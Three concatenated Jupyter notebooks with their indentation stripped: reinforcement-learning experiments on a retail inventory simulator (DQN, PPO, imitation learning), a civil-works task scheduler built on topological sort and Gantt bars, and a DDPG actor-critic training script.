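Overstocked items (the second one here) get a zero order, while understocked items are replenished up to the safety level.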
# +
#Same for the fixed order rate
rewards_sq_policy = []
for i in range(100):
ra = []
done = False
kwargsStore= {'assortment_size': 250, 'lead_time': 1,
'max_stock': 1000, 'seed': i, 'forecastVariance' :0.000, 'horizon': 500}
store = retail.StoreEnv(**kwargsStore)
while not (done):
order = F.relu(2*store.assortment.base_demand*bucket_customers.max()-store.get_full_inventory_position()).round()
obs = store.step(order.numpy())
ra.append(obs[1])
done = obs[2]
rewards_sq_policy.append(torch.stack(ra).mean())
# +
#Now, we recover our DQN network and collect results
kwargsModel = {'input_size': 1006, 'hidden_sizes': [100,200, 500, 1000], 'conv_size': 1000, 'n_kernels': 50}
newDic= torch.load('dqn-lt1.pt',map_location=torch.device('cpu'))
model = DQNModel(**kwargsModel)
model.load_state_dict(newDic['model'])
rewards_dqn = []
for i in range(100):
print(i)
ra = []
done = False
kwargsStore= {'assortment_size': 250, 'lead_time': 1,
'max_stock': 1000, 'seed': i, 'forecastVariance' :0.000, 'horizon': 500}
store = retail.StoreEnv(**kwargsStore)
while not (done):
mu = model(store.get_obs(),5, 10).max(1)[1]
obs = store.step(mu.detach().numpy())
ra.append(obs[1])
done = obs[2]
rewards_dqn.append(torch.stack(ra).mean())
# +
#Same for PPO
kwargsModel = {'input_size': 1006, 'hidden_sizes': [100,200,100],
'output_size': 3, 'conv_size': 1000, 'n_kernels': 50}
newDic= torch.load('ijcai_genplan-ppo-lt1.pt',map_location=torch.device('cpu'))
model = NewPPO(**kwargsModel)
model.load_state_dict(newDic)
rewards_ppo = []
for i in range(100):
ra = []
done = False
kwargsStore= {'assortment_size': 250, 'lead_time': 1,'symmetric_action_space': True,
'max_stock': 1000, 'seed': i, 'forecastVariance' :0.000, 'horizon': 500}
store = retail.StoreEnv(**kwargsStore)
while not (done):
mu, sigma, value = model(store.get_obs(),5, 10)
obs = store.step(mu.detach().numpy())
ra.append(obs[1])
done = obs[2]
rewards_ppo.append(torch.stack(ra).mean())
print(torch.stack(ra).mean())
# +
# We now move to imitation learning. We collect samples from the forecast-based policy
actionList = []
observations = []
rewards = []
# Here, the seeds ensure that we do not mix train and test data
for i in range(101,1101):
ra = []
done = False
kwargsStore= {'assortment_size': 1, 'lead_time': 1,
'max_stock': 1000, 'seed': i, 'forecastVariance' :0.000, 'horizon': 500}
store = retail.StoreEnv(**kwargsStore)
while not (done):
observations.append(store.get_obs())
customers = bucket_customers.sum()
p = store.forecast.squeeze()
std = torch.sqrt(customers*p+(1-p))
order = F.relu(3*std+store.forecast.squeeze()*customers-store.get_full_inventory_position()).round()
obs = store.step(order.numpy())
ra.append(obs[1])
actionList.append(order)
done = obs[2]
rewards += ra
# -
from torch.utils.data import Dataset, DataLoader
class ClassicDataSet(Dataset):
def __init__(self, x, y, r):
self._x = x
self._y = y
self._r = r
self._len = x.shape[0]
def __len__(self):
return(self._len)
def __getitem__(self, index):
return(self._x[index], self._y[index], self._r[index])
# +
y = torch.stack(actionList)
x = torch.stack(observations)
r = torch.stack(rewards)
action_reaction = ClassicDataSet(x, y, r)
data_loader = DataLoader(action_reaction, batch_size=128,
shuffle=True, num_workers=2)
# -
# Now, we simply need to replicate this policy. The neural network used is the same as for PPO
kwargsPPO = {'input_size': 1006, 'hidden_sizes': [100,200,100],
'output_size': 3, 'conv_size': 1000, 'n_kernels': 50}
newNet = NewPPO(**kwargsPPO)
criterion = nn.MSELoss()
optimizer = torch.optim.Adam(newNet.parameters(), lr=1e-3)
for epoch in range(20):
# Training
s = 0
s2 = 0
for data, target, reward in (data_loader):
net_out = newNet(data,0,0)
loss = criterion(net_out[0], target)
s += loss
loss.backward()
optimizer.step()
optimizer.zero_grad()
print(s)
name = 'imitationLearning.pt'
torch.save(newNet.state_dict(),name)
# +
#We now collect rewards from the imitating neural network
rewards_imitation = []
for i in range(100):
print(i)
ra = []
done = False
kwargsStore= {'assortment_size': 250, 'lead_time': 1,
'max_stock': 1000, 'seed': i, 'forecastVariance' :0.000, 'horizon': 500}
store = retail.StoreEnv(**kwargsStore)
while not (done):
mu, sigma, value = newNet(store.get_obs(),5, 10)
obs = store.step(mu.detach().numpy())
ra.append(obs[1])
done = obs[2]
rewards_imitation.append(torch.stack(ra).mean())
# -
# We can plot the distribution of rewards
import matplotlib.pyplot as plt
import seaborn as sns
sns.kdeplot(torch.stack(rewards_dqn).numpy())
# We can now save the results. It's easy to compute the mean or the std over the obtained samples.
# +
baseline_csv = torch.stack((torch.stack(rewards_sq_policy), torch.stack(rewards_forecast_order))).numpy()
rl_csv = torch.stack((torch.stack(rewards_dqn), torch.stack(rewards_ppo), torch.stack(rewards_imitation))).numpy()
np.savetxt("baseline_results.csv", baseline_csv, delimiter=",")
np.savetxt("rl_results.csv", rl_csv, delimiter=",")
|
notebooks/Experiments.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python [conda env:.conda-gisenv] *
# language: python
# name: conda-env-.conda-gisenv-py
# ---
from collections import defaultdict
import pandas as pd
import os
import math
#myfolder=r'F:\website\cmis6\Civilworks cost\Work Schedule' #office computer
myfolder=r'E:\Website_26_07_2020\cmis6\Civilworks cost\Work Schedule' #home computer
inputpath=os.path.join(myfolder,'Schdule Input.xlsx')
class GanttBar:
def __init__(self,start,duration):
self.start_day=start
self.duration=duration
self.finish_day=self.start_day+self.duration
def addTaskUnit(self,unit):
self.taskUnit=unit
def addTaskVolume(self,volume):
self.taskVolume=volume
self.productionRate=math.ceil(self.taskVolume/self.duration)
# +
"""Class to represent graph"""
class Graph:
def __init__(self,vertices):
self.graph=defaultdict(list)
self.V=vertices
self.indeg0=[True]*(self.V+1)
self.outdeg0=[True]*(self.V+1)
self.edges=[]
self.adj=defaultdict(list)
self.visited=[False]*(self.V+1)
self.path=[]
self.durations=[]
self.taskchains=[]
self.tc_durations=[]
self.minimum_start_date=[0]*self.V
# function to add an edge to graph
def addEdge(self,u,v):
self.graph[u].append(v)
edge=(u,v)
print(edge)
self.edges.append(edge)
# set indeg0[v] <- false
self.indeg0[v] = False
# set outdeg0[u] <- false
self.outdeg0[u] = False
#print(self.graph[u])
# A recursive function used by topologicalSort
def topologicalSortUtil(self,v,visited,stack):
#mark the current node as visited
visited[v]=True
# Recur for all the vertices adjacent to this vertex
for i in self.graph[v]:
if visited[i]==False:
self.topologicalSortUtil(i,visited,stack)
# Mark the current node as visited.
stack.insert(0,v)
# The function to do Topological Sort. It uses recursive
# topologicalSortUtil()
def topologicalSort(self):
# Mark all the vertices as not visited
visited=[False]*(self.V+1)
stack=[]
# Call the recursive helper function to store Topological
# Sort starting from all vertices one by one
for i in range(self.V):
if visited[i]==False:
self.topologicalSortUtil(i,visited,stack)
print (stack)
def displayGraph(self):
print("number of vertices={}".format(self.V))
print(self.graph)
print("indegree={}".format(self.indeg0))
print("outdegree={}".format(self.outdeg0))
print("edges of the graph......")
print(self.edges)
print("durations of tasks")
print(self.durations)
def dfs(self,s):
k=0
#append the node in path
#and set visited
self.path.append(s)
self.visited[s]=True
# Path started with a node
# having in-degree 0 and
# current node has out-degree 0,
# print current path
if self.outdeg0[s] and self.indeg0[self.path[0]]:
print(*self.path)
self.taskchains.append(list(self.path))
#for p in self.path:
#self.taskchains[k].append(p)
#myvalue[k]=self.path
#
k=k+1
#print(myvalue)
# Recursive call to print all paths
for node in self.graph[s]:
if not self.visited[node]:
self.dfs(node)
# Remove node from path
# and set unvisited
#return self.path
#print(self.path)
#self.taskchains[s]=self.path
self.path.pop()
self.visited[s]=False
#return myvalue
def print_all_paths(self):
for i in range(self.V):
if self.indeg0[i] and self.graph[i]:
self.path=[]
self.visited=[False]*(self.V+1)
self.dfs(i)
#print("path={}".format(p))
def addDurations(self,duration_list):
self.durations=duration_list
def findPathdurations(self,path):
total_duration=0
for p in path:
total_duration +=self.durations[p-1]
return total_duration
def findPathCumulativeDurations(self,path):
total_duration=0
path_cum=[]
for p in path:
total_duration +=self.durations[p-1]
path_cum.append(total_duration)
self.tc_durations.append(path_cum)
#return path_cum
def findStratDateofTasks(self):
for T in range(1,self.V+1):
d=self.findMinimumStartDateOfTask(T)
print("Task-{} sdate={}".format(T,d))
self.minimum_start_date[T-1]=d
def findMinimumStartDateOfTask(self,T):
d=self.durations[T-1]
duration_list=[]
for tc,tcd in zip(self.taskchains,self.tc_durations):
if T in tc:
index=tc.index(T)
sdate=tcd[index]-d+1
duration_list.append(sdate)
#print("task found in={}".format(index))
#print("chain={} duration={}".format(tc,tcd))
#print("duration of tasks no={} total_time={}".format(T,d))
max_start_date=max(duration_list)
return max_start_date
def calculateStartOfAllTasks(self):
for chain in self.taskchains:
#duration=self.findPathdurations(chain)
self.findPathCumulativeDurations(chain)
def scheduleTask(self):
self.topologicalSort()
#self.displayGraph()
self.print_all_paths()
print(self.taskchains)
for chain in self.taskchains:
#duration=self.findPathdurations(chain)
self.findPathCumulativeDurations(chain)
#self.calculateStartOfAllTasks()
#print(self.tc_durations)
self.findStratDateofTasks()
self.findProjectDuration()
def createGanttSchedule(self):
mytasks=[]
for i in range(1,self.V+1):
duration=self.durations[i-1]
sday=self.minimum_start_date[i-1]
bar=GanttBar(sday,duration)
mytasks.append(bar)
return mytasks
def findProjectDuration(self):
project_durations=[]
for tcd in self.tc_durations:
dmax=max(tcd)
#print(dmax)
project_durations.append(dmax)
self.finishDay=max(project_durations)
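`scheduleTask` above derives the project duration from the task chains: each chain's cumulative durations give per-task finish days, and the project ends when the longest chain does. A minimal standalone sketch with made-up tasks and chains:

```python
# Tasks 1..4 with their durations; two precedence chains from source to sink.
durations = [3, 2, 5, 4]
taskchains = [[1, 2, 4], [1, 3, 4]]

# Cumulative durations along each chain, as findPathCumulativeDurations does.
tc_durations = []
for chain in taskchains:
    total, cum = 0, []
    for task in chain:
        total += durations[task - 1]
        cum.append(total)
    tc_durations.append(cum)

# The project finishes when the longest chain does, as findProjectDuration does.
finish_day = max(max(cum) for cum in tc_durations)
print(tc_durations)  # [[3, 5, 9], [3, 8, 12]]
print(finish_day)    # 12
```

The chain through task 3 is the critical path here: shortening any task off it would not change the finish day.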
# +
#Python program to print topological sorting of a DAG
from collections import defaultdict
#Class to represent a graph
class Graph2:
def __init__(self,vertices):
self.graph = defaultdict(list) #dictionary containing adjacency List
self.V = vertices #No. of vertices
# function to add an edge to graph
def addEdge(self,u,v):
self.graph[u].append(v)
# A recursive function used by topologicalSort
def topologicalSortUtil(self,v,visited,stack):
# Mark the current node as visited.
visited[v] = True
# Recur for all the vertices adjacent to this vertex
for i in self.graph[v]:
if visited[i] == False:
self.topologicalSortUtil(i,visited,stack)
# Push current vertex to stack which stores result
stack.insert(0,v)
# The function to do Topological Sort. It uses recursive
# topologicalSortUtil()
def topologicalSort(self):
# Mark all the vertices as not visited
visited = [False]*self.V
stack =[]
# Call the recursive helper function to store Topological
# Sort starting from all vertices one by one
for i in range(self.V):
if visited[i] == False:
self.topologicalSortUtil(i,visited,stack)
# Print contents of stack
print(stack)
# +
g= Graph(6)
g.addEdge(5, 2);
g.addEdge(5, 0);
g.addEdge(4, 0);
g.addEdge(4, 1);
g.addEdge(2, 3);
g.addEdge(3, 1);
print ("Following is a Topological Sort of the given graph")
g.topologicalSort()
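The recursive DFS-based sort above can also be done iteratively with Kahn's algorithm, which additionally detects cycles in the precedence graph. A sketch, not part of the original notebook, run on the same edges as the example above:

```python
from collections import defaultdict, deque

def kahn_topological_sort(edges, vertices):
    """Iterative topological sort (Kahn's algorithm)."""
    graph = defaultdict(list)
    indegree = [0] * vertices
    for u, v in edges:
        graph[u].append(v)
        indegree[v] += 1
    # Start from all vertices with no incoming edges.
    queue = deque(i for i in range(vertices) if indegree[i] == 0)
    order = []
    while queue:
        u = queue.popleft()
        order.append(u)
        for v in graph[u]:
            indegree[v] -= 1
            if indegree[v] == 0:
                queue.append(v)
    if len(order) != vertices:
        raise ValueError("graph has a cycle")
    return order

edges = [(5, 2), (5, 0), (4, 0), (4, 1), (2, 3), (3, 1)]
print(kahn_topological_sort(edges, 6))
```

The cycle check is useful for schedule input validation: a cyclic predecessor list in the WBS sheet would otherwise send the recursive version into infinite recursion.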
# +
def text2List(input_text):
split_text=input_text.split(',')
output_list=[int(x) for x in split_text ]
return output_list
def buildGraph(input_df):
shape=input_df.shape
g=Graph(shape[0])
print(shape)
for index,row in input_df.iterrows():
v=row['TaskNo']
if row['Predecessor']!=-1:
pred_text=str(row['Predecessor'])
length=len(pred_text)
if length >1:
sources=text2List(pred_text)
#print(sources)
else:
sources=[int(pred_text)]
#print("sources={}".format(sources))
for u in sources:
g.addEdge(u,v)
#print("predecosseo no={} value={}".format(length,pred_text))
#print(len(pred_text))
#print(pred_text)
duration_list=list(input_df['Duration'])
g.addDurations(duration_list)
return g
# -
sheetName='WBS'
myframe=pd.read_excel(inputpath,sheet_name=sheetName)
myframe.fillna(0,inplace=True)
myframe
g=buildGraph(myframe)
g.scheduleTask()
print(g.finishDay)
mybars=g.createGanttSchedule()
g.findProjectDuration()
# +
g.topologicalSort()
g.displayGraph()
g.print_all_paths()
# -
mybars
print(g.durations)
for chain in g.taskchains:
duration=g.findPathdurations(chain)
cum=g.findPathCumulativeDurations(chain)
print("tasks={} total duration={}".format(chain,duration))
print("tasks={} cumdistance={}".format(chain, cum))
print( g.tc_durations[1])
max_date=g.findMinimumStartDateOfTask(9)
g.findStratDateofTasks()
print(g.minimum_start_date)
|
Civilworks cost/Work Schedule/simple_gannt_schedule.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
import os
import tensorflow as tf
import numpy as np
import roboschool
import gym
from gym import wrappers
import tflearn
import argparse
import pprint as pp
from replay_buffer import ReplayBuffer
import logging
from tensorflow.python.client import device_lib
def get_available_devices():
local_device_protos = device_lib.list_local_devices()
return [x.name for x in local_device_protos if x.device_type == 'GPU' or x.device_type=='CPU']
tf_available_devices = get_available_devices()
print(tf_available_devices)
# ===========================
# Actor and Critic DNNs
# ===========================
class ActorNetwork(object):
"""
Input to the network is the state, output is the action
under a deterministic policy.
The output layer activation is a tanh to keep the action
between -action_bound and action_bound
"""
def __init__(self, sess, continuous_act_space_flag, state_dim, action_dim, action_bound, learning_rate, tau, batch_size):
self.sess = sess
self.continuous_act_space_flag = continuous_act_space_flag
self.s_dim = state_dim
self.a_dim = action_dim
self.action_bound = action_bound
self.learning_rate = learning_rate
self.tau = tau
self.batch_size = batch_size
# Actor Network
self.inputs, self.out, self.scaled_out = self.create_actor_network()
self.network_params = tf.trainable_variables()
# Target Network
self.target_inputs, self.target_out, self.target_scaled_out = self.create_actor_network()
self.target_network_params = tf.trainable_variables()[
len(self.network_params):]
# Op for periodically updating target network with online network
# weights
self.update_target_network_params = \
[self.target_network_params[i].assign(tf.multiply(self.network_params[i], self.tau) +
tf.multiply(self.target_network_params[i], 1. - self.tau))
for i in range(len(self.target_network_params))]
# This gradient will be provided by the critic network
self.action_gradient = tf.placeholder(tf.float32, [None, self.a_dim])
# Combine the gradients here
self.unnormalized_actor_gradients = tf.gradients(
self.scaled_out, self.network_params, -self.action_gradient)
self.actor_gradients = list(map(lambda x: tf.div(x, self.batch_size), self.unnormalized_actor_gradients))
# Optimization Op
self.optimize = tf.train.AdamOptimizer(self.learning_rate).\
apply_gradients(zip(self.actor_gradients, self.network_params))
self.num_trainable_vars = len(
self.network_params) + len(self.target_network_params)
def create_actor_network(self):
inputs = tflearn.input_data(shape=[None, self.s_dim])
net = tflearn.fully_connected(inputs, 400)
net = tflearn.layers.normalization.batch_normalization(net)
net = tflearn.activations.relu(net)
net = tflearn.fully_connected(net, 300)
net = tflearn.layers.normalization.batch_normalization(net)
net = tflearn.activations.relu(net)
# Final layer weights are init to Uniform[-3e-3, 3e-3]
w_init = tflearn.initializations.uniform(minval=-0.003, maxval=0.003)
# If Actor acts on discrete action space, use Softmax
if self.continuous_act_space_flag is True:
out = tflearn.fully_connected(
net, self.a_dim, activation='tanh', weights_init=w_init)
else:
out = tflearn.fully_connected(
net, self.a_dim, activation='softmax', weights_init=w_init)
# Scale output to -action_bound to action_bound
scaled_out = tf.multiply(out, self.action_bound)
return inputs, out, scaled_out
def train(self, inputs, a_gradient):
self.sess.run(self.optimize, feed_dict={
self.inputs: inputs,
self.action_gradient: a_gradient
})
def predict(self, inputs):
return self.sess.run(self.scaled_out, feed_dict={
self.inputs: inputs
})
def predict_target(self, inputs):
return self.sess.run(self.target_scaled_out, feed_dict={
self.target_inputs: inputs
})
def update_target_network(self):
self.sess.run(self.update_target_network_params)
def get_num_trainable_vars(self):
return self.num_trainable_vars
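The `update_target_network_params` op in `ActorNetwork` implements Polyak averaging: each target weight slowly tracks its online counterpart, theta_target <- tau * theta_online + (1 - tau) * theta_target. A NumPy sketch with an illustrative tau and a single weight vector:

```python
import numpy as np

tau = 0.01
online = np.array([1.0, 2.0, 3.0])  # stand-in for the online network weights
target = np.zeros(3)                # target network starts elsewhere

# Repeated soft updates: the target exponentially approaches the online weights.
for _ in range(500):
    target = tau * online + (1 - tau) * target

# After n updates, target = online * (1 - (1 - tau)^n).
print(target)
```

The small tau keeps the target network nearly stationary between updates, which is what stabilizes the bootstrapped Q-targets in DDPG.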
class CriticNetwork(object):
"""
Input to the network is the state and action, output is Q(s,a).
The action must be obtained from the output of the Actor network.
"""
def __init__(self, sess, state_dim, action_dim, learning_rate, tau, gamma, num_actor_vars):
self.sess = sess
self.s_dim = state_dim
self.a_dim = action_dim
self.learning_rate = learning_rate
self.tau = tau
self.gamma = gamma
# Create the critic network
self.inputs, self.action, self.out = self.create_critic_network()
self.network_params = tf.trainable_variables()[num_actor_vars:]
# Target Network
self.target_inputs, self.target_action, self.target_out = self.create_critic_network()
self.target_network_params = tf.trainable_variables()[(len(self.network_params) + num_actor_vars):]
# Op for periodically updating target network with online network
# weights with regularization
self.update_target_network_params = \
[self.target_network_params[i].assign(tf.multiply(self.network_params[i], self.tau) \
+ tf.multiply(self.target_network_params[i], 1. - self.tau))
for i in range(len(self.target_network_params))]
# Network target (y_i)
self.predicted_q_value = tf.placeholder(tf.float32, [None, 1])
# Define loss and optimization Op
self.loss = tflearn.mean_square(self.predicted_q_value, self.out)
self.optimize = tf.train.AdamOptimizer(
self.learning_rate).minimize(self.loss)
# Get the gradient of the net w.r.t. the action.
# For each action in the minibatch (i.e., for each x in xs),
# this will sum up the gradients of each critic output in the minibatch
# w.r.t. that action. Each output is independent of all
# actions except for one.
self.action_grads = tf.gradients(self.out, self.action)
def create_critic_network(self):
inputs = tflearn.input_data(shape=[None, self.s_dim])
action = tflearn.input_data(shape=[None, self.a_dim])
# TODO
powerful_critic = True
if powerful_critic is True:
net = tflearn.fully_connected(inputs, 400)
net = tflearn.layers.normalization.batch_normalization(net)
net = tflearn.activations.relu(net)
# Add the action tensor in the 2nd hidden layer
# Use two temp layers to get the corresponding weights and biases
t1 = tflearn.fully_connected(net, 300)
t2 = tflearn.fully_connected(action, 300)
net = tflearn.activation(
tf.matmul(net, t1.W) + tf.matmul(action, t2.W) + t2.b, activation='relu')
else:
net = tflearn.fully_connected(inputs, 400)
net = tflearn.layers.normalization.batch_normalization(net)
net = tflearn.activations.relu(net)
# Add the action tensor in the 2nd hidden layer
# Use two temp layers to get the corresponding weights and biases
t1 = tflearn.fully_connected(net, 600)
t2 = tflearn.fully_connected(action, 600)
net = tflearn.activation(
tf.matmul(net, t1.W) + tf.matmul(action, t2.W) + t2.b, activation='relu')
# # Add the action tensor in the 2nd hidden layer
# # Use two temp layers to get the corresponding weights and biases
# t1 = tflearn.fully_connected(inputs, 300)
# t2 = tflearn.fully_connected(action, 300)
#
# net = tflearn.activation(
# tf.matmul(inputs, t1.W) + tf.matmul(action, t2.W) + t2.b, activation='relu')
# linear layer connected to 1 output representing Q(s,a)
# Weights are init to Uniform[-3e-3, 3e-3]
w_init = tflearn.initializations.uniform(minval=-0.003, maxval=0.003)
out = tflearn.fully_connected(net, 1, weights_init=w_init)
return inputs, action, out
def train(self, inputs, action, predicted_q_value):
return self.sess.run([self.out, self.optimize], feed_dict={
self.inputs: inputs,
self.action: action,
self.predicted_q_value: predicted_q_value
})
def predict(self, inputs, action):
return self.sess.run(self.out, feed_dict={
self.inputs: inputs,
self.action: action
})
def predict_target(self, inputs, action):
return self.sess.run(self.target_out, feed_dict={
self.target_inputs: inputs,
self.target_action: action
})
def action_gradients(self, inputs, actions):
return self.sess.run(self.action_grads, feed_dict={
self.inputs: inputs,
self.action: actions
})
def update_target_network(self):
self.sess.run(self.update_target_network_params)
# Taken from https://github.com/openai/baselines/blob/master/baselines/ddpg/noise.py, which is
# based on http://math.stackexchange.com/questions/1287634/implementing-ornstein-uhlenbeck-in-matlab
class OrnsteinUhlenbeckActionNoise:
def __init__(self, mu, sigma=0.3, theta=.15, dt=1e-2, x0=None):
self.theta = theta
self.mu = mu
self.sigma = sigma
self.dt = dt
self.x0 = x0
self.reset()
def __call__(self):
x = self.x_prev + self.theta * (self.mu - self.x_prev) * self.dt + \
self.sigma * np.sqrt(self.dt) * np.random.normal(size=self.mu.shape)
self.x_prev = x
return x
def reset(self):
self.x_prev = self.x0 if self.x0 is not None else np.zeros_like(self.mu)
def __repr__(self):
return 'OrnsteinUhlenbeckActionNoise(mu={}, sigma={})'.format(self.mu, self.sigma)
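A standalone run of the Ornstein-Uhlenbeck process defined above (same default theta, sigma, and dt) shows the temporally correlated, mean-reverting noise it adds to actions:

```python
import numpy as np

# Euler-Maruyama OU recursion, matching OrnsteinUhlenbeckActionNoise.__call__.
mu, theta, sigma, dt = np.zeros(2), 0.15, 0.3, 1e-2
x = np.zeros_like(mu)

rng = np.random.RandomState(0)
trace = []
for _ in range(1000):
    x = x + theta * (mu - x) * dt + sigma * np.sqrt(dt) * rng.normal(size=mu.shape)
    trace.append(x.copy())

trace = np.stack(trace)
print(trace.mean(axis=0))  # hovers near mu
```

Unlike independent Gaussian noise, consecutive samples are correlated, so the perturbed actions drift smoothly instead of jittering, which suits physical control tasks.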
# ===========================
# Tensorflow Summary Ops
# ===========================
def build_summaries():
episode_reward = tf.Variable(0.)
tf.summary.scalar("Reward", episode_reward)
episode_ave_max_q = tf.Variable(0.)
tf.summary.scalar("Qmax_Value", episode_ave_max_q)
summary_vars = [episode_reward, episode_ave_max_q]
summary_ops = tf.summary.merge_all()
return summary_ops, summary_vars
# ===========================
# Agent Training
# ===========================
def train(sess, env, args, actor, critic, actor_noise):
# Set up summary Ops
summary_ops, summary_vars = build_summaries()
sess.run(tf.global_variables_initializer())
writer = tf.summary.FileWriter(args['summary_dir'], sess.graph)
# Initialize target network weights
actor.update_target_network()
critic.update_target_network()
# Epsilon parameter
epsilon = args['epsilon_max']
# Initialize replay memory
replay_buffer = ReplayBuffer(int(args['buffer_size']), int(args['random_seed']))
# Time step
time_step = 0.
# Needed to enable BatchNorm.
# This hurts the performance on Pendulum but could be useful
# in other environments.
# tflearn.is_training(True)
for i in range(int(args['max_episodes'])):
s = env.reset()
ep_reward = 0
ep_ave_max_q = 0
ep_steps = 0
while True:
if args['render_env_flag']:
env.render()
# Added exploration noise
#a = actor.predict(np.reshape(s, (1, 3))) + (1. / (1. + i))
# TODO: different exploration strategy
a = []
action = []
exploration_strategy = args['exploration_strategy']
if exploration_strategy == 'action_noise':
a = actor.predict(np.reshape(s, (1, actor.s_dim))) + actor_noise()
# Convert continuous action into discrete action
if args['continuous_act_space_flag'] is True:
action = a[0]
else:
action = np.argmax(a[0])
elif exploration_strategy == 'epsilon_greedy':
if np.random.rand() < epsilon:
if args['continuous_act_space_flag'] is True:
a = np.reshape(env.action_space.sample(), (1, actor.a_dim))
else:
a = np.random.uniform(0, 1, (1, actor.a_dim))
else:
a = actor.predict(np.reshape(s, (1, actor.s_dim)))
# Convert continuous action into discrete action
if args['continuous_act_space_flag'] is True:
action = a[0]
else:
action = np.argmax(a[0])
else:
print('Please choose a proper exploration strategy!')
s2, r, terminal, info = env.step(action)
replay_buffer.add(np.reshape(s, (actor.s_dim,)), np.reshape(a, (actor.a_dim,)), r,
terminal, np.reshape(s2, (actor.s_dim,)))
# Reduce epsilon
time_step += 1.
epsilon = args['epsilon_min'] + (args['epsilon_max'] - args['epsilon_min']) * np.exp(-args['epsilon_decay'] * time_step)
# Keep adding experience to the memory until
# there are at least minibatch size samples
if replay_buffer.size() > int(args['minibatch_size']):
s_batch, a_batch, r_batch, t_batch, s2_batch = \
replay_buffer.sample_batch(int(args['minibatch_size']))
if args['double_ddpg_flag']:
# Calculate targets: Double DDPG
target_q = critic.predict_target(
s2_batch, actor.predict(s2_batch))
else:
# Calculate targets
target_q = critic.predict_target(
s2_batch, actor.predict_target(s2_batch))
y_i = []
for k in range(int(args['minibatch_size'])):
if t_batch[k]:
y_i.append(r_batch[k])
else:
y_i.append(r_batch[k] + critic.gamma * target_q[k])
# Update the critic given the targets
predicted_q_value, _ = critic.train(
s_batch, a_batch, np.reshape(y_i, (int(args['minibatch_size']), 1)))
ep_ave_max_q += np.amax(predicted_q_value)
# Update the actor policy using the sampled gradient
a_outs = actor.predict(s_batch)
grads = critic.action_gradients(s_batch, a_outs)
actor.train(s_batch, grads[0])
# Update target networks
if args['target_hard_copy_flag']:
if ep_steps % args['target_hard_copy_interval'] == 0:
actor.update_target_network()
critic.update_target_network()
else:
actor.update_target_network()
critic.update_target_network()
s = s2
ep_reward += r
ep_steps += 1
# if terminal or reach maximum length
if terminal:
summary_str = sess.run(summary_ops, feed_dict={
summary_vars[0]: ep_reward,
summary_vars[1]: ep_ave_max_q / float((ep_steps + 1))
})
writer.add_summary(summary_str, i)
writer.flush()
ep_stats = '| Episode: {0} | Steps: {1} | Reward: {2:.4f} | Qmax: {3:.4f}'.format(i,
(ep_steps + 1),
ep_reward,
(ep_ave_max_q / float(ep_steps+1)))
print(ep_stats)
logging.info(ep_stats)
break
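# The target-network updates above use soft (Polyak) averaging with rate `tau`;
# the hard-copy flag simply sets `tau = 1.0` so the target becomes an exact copy.
# An illustrative NumPy sketch of that update (the real update is a TensorFlow
# assign op inside the actor/critic network classes):

```python
import numpy as np

def soft_update(target_weights, main_weights, tau):
    """theta_target <- tau * theta_main + (1 - tau) * theta_target."""
    return [tau * w + (1.0 - tau) * tw
            for w, tw in zip(main_weights, target_weights)]

main = [np.ones((2, 2))]
target = [np.zeros((2, 2))]
target = soft_update(target, main, tau=0.001)
print(target[0][0, 0])  # 0.001
```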
def main(args):
with tf.Session() as sess:
env = gym.make(args['env'])
np.random.seed(int(args['random_seed']))
tf.set_random_seed(int(args['random_seed']))
env.seed(int(args['random_seed']))
state_dim = env.observation_space.shape[0]
# Set action_dim for continuous and discrete action space
if args['continuous_act_space_flag'] is True:
action_dim = env.action_space.shape[0]
action_bound = env.action_space.high
# Ensure action bound is symmetric
assert (env.action_space.high == -env.action_space.low).all()
else:
action_dim = env.action_space.n
# If discrete action, actor uses Softmax and action_bound is always 1
action_bound = 1
# Use hardcopy way to update target NNs.
if args['target_hard_copy_flag'] is True:
args['tau'] = 1.0
actor = ActorNetwork(sess, args['continuous_act_space_flag'],
state_dim, action_dim, action_bound,
float(args['actor_lr']), float(args['tau']),
int(args['minibatch_size']))
critic = CriticNetwork(sess, state_dim, action_dim,
float(args['critic_lr']), float(args['tau']),
float(args['gamma']),
actor.get_num_trainable_vars())
actor_noise = OrnsteinUhlenbeckActionNoise(mu=np.zeros(action_dim))
# Record videos
# Use the gym env Monitor wrapper
if args['use_gym_monitor_flag']:
monitor_dir = os.path.join(args['summary_dir'], 'gym_monitor')
env = wrappers.Monitor(env, monitor_dir,
resume=True,
video_callable=lambda count: count % args['record_video_every'] == 0)
train(sess, env, args, actor, critic, actor_noise)
if args['use_gym_monitor_flag']:
env.close()
else:
env.close()
# +
# if __name__ == '__main__':
# parser = argparse.ArgumentParser(description='provide arguments for DDPG agent')
# # agent parameters
# parser.add_argument('--actor-lr', type=float, default=0.0001, help='actor network learning rate')
# parser.add_argument('--critic-lr', type=float, default=0.001, help='critic network learning rate')
# parser.add_argument('--gamma', type=float, default=0.99, help='discount factor for critic updates')
# parser.add_argument('--tau', type=float, default=0.001, help='soft target update parameter')
# parser.add_argument('--buffer-size', type=int, default=1000000, help='max size of the replay buffer')
# parser.add_argument('--minibatch-size', type=int, default=64, help='size of minibatch for minibatch-SGD')
# parser.add_argument("--continuous-act-space-flag", action="store_true", help='act on continuous action space')
# parser.add_argument("--exploration-strategy", type=str, choices=["action_noise", "epsilon_greedy"],
# default='epsilon_greedy', help='action_noise or epsilon_greedy')
# parser.add_argument("--epsilon-max", type=float, default=1.0, help='maximum of epsilon')
# parser.add_argument("--epsilon-min", type=float, default=.01, help='minimum of epsilon')
# parser.add_argument("--epsilon-decay", type=float, default=.001, help='epsilon decay')
# # train parameters
# parser.add_argument('--double-ddpg-flag', action="store_true", help='True, if run double-ddpg-flag. Otherwise, False.')
# parser.add_argument('--target-hard-copy-flag', action="store_true", help='Target network update method: hard copy')
# parser.add_argument('--target-hard-copy-interval', type=int, default=200, help='Target network update hard copy interval')
# # run parameters
# # HalfCheetah-v2, Ant-v2, InvertedPendulum-v2, Pendulum-v0
# parser.add_argument('--env', type=str, default='HalfCheetah-v2', help='choose the gym env- tested on {Pendulum-v0}')
# parser.add_argument('--random-seed', type=int, default=1234, help='random seed for repeatability')
# parser.add_argument('--max-episodes', type=int, default=50000, help='max num of episodes to do while training')
# # parser.add_argument("--max-episode-len", type=int, default=1000, help='max length of 1 episode')
# parser.add_argument("--render-env-flag", action="store_true", help='render environment')
